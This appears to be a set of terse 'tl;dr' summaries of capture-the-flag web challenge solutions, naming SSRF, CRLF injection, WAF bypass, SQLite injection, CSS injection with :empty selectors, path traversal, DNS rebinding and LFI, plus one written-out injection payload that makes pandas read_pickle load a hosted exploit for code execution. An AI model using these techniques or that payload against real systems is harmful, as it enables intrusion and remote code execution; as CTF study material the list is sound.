tl;dr

• SSRF using file_get_contents() and CRLF in ini_set()
• basic Header quirks to bypass waf
• sqli using column trick in SQLite to get the flag

tl;dr
- CSS injection using url forging
- leaking password using :empty selectors

tl;dr
-Get the docker-entrypoint.sh using /static../docker-entrypoint.sh
-Get the challenge files using /static../panda/cgi-bin/search_currency.py
-Host your exploit and use x’|@pd.read_pickle(‘http://0.0.0.0:6334/output.exploit')|' to execute the exploit

tl;dr

• Create a note with meta redirect tag to get callback.
• Leak the flag using search functionality.

tl;dr

• Use DNS Rebinding attack to read flag from /flag endpoint.

tl;dr

• /source to get the source
• Access local host from dev_test using SSRF
• SQLI to get the flag path a nd LFI to get the flag